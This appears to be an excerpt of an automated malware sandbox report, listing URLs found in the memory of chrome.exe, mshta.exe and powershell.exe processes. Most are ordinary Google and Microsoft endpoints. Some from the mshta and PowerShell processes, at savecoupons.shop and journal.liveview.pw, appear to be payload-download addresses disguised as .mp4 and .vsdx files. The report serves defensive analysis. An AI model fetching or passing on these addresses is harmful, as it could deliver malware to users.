Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugsp_
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/292285899
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/349489248
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://journal.liveview.pw
Source: powershell.exe, 00000006.00000002.57162749245.0000000004590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://journal.liveview.pw/singl6.vsdx
Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://journal.liveview.pw/singl6.vsdx4
Source: chrome.exe, 00000009.00000002.57300353725.0000781C03920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228652650.0000781C03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000009.00000002.57289152036.0000781C02990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286804233.0000781C02448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000009.00000002.57296232095.0000781C033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0BJP
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: mshta.exe, 00000002.00000002.56249468249.0000000003198000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.0000000003196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comt
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/ebapp
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292045866.0000781C02D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.57293738861.0000781C03020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-emailp_
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myshop.amplify.com/cart
Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287173425.0000781C02544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.com/setup
Source: chrome.exe, 00000009.00000002.57287788903.0000781C02664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287460063.0000781C02591000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300950290.0000781C03A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295825106.0000781C03324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0BJ
Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXEr
Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poshmark.com/bundles/shop
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://recoveringlib.blogspot.com/
Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/
Source: powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/si
Source: powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56228034804.0000000008311000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56226345857.0000000008182000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56227747151.00000000082B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4
Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4)
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56247007984.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249621751.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://savecoupons.shop/singl6.mp4...
